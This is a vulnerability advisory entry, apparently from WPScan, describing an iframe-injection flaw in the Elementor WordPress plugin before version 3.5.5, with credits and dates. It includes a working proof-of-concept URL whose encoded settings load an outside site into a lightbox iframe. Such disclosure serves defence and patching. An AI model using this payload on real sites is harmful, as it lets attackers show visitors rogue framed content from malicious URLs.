WordPress Plugin Vulnerabilities
Elementor < 3.5.5 - Iframe Injection
Description
The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.
Proof of Concept
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
Affects Plugins
References
Classification
Type
CROSS FRAME SCRIPTING
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Miguel Santareno
Submitter
Miguel Santareno
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-07-19 (about 9 months ago)
Added
2023-07-19 (about 9 months ago)
Last Updated
2023-07-19 (about 9 months ago)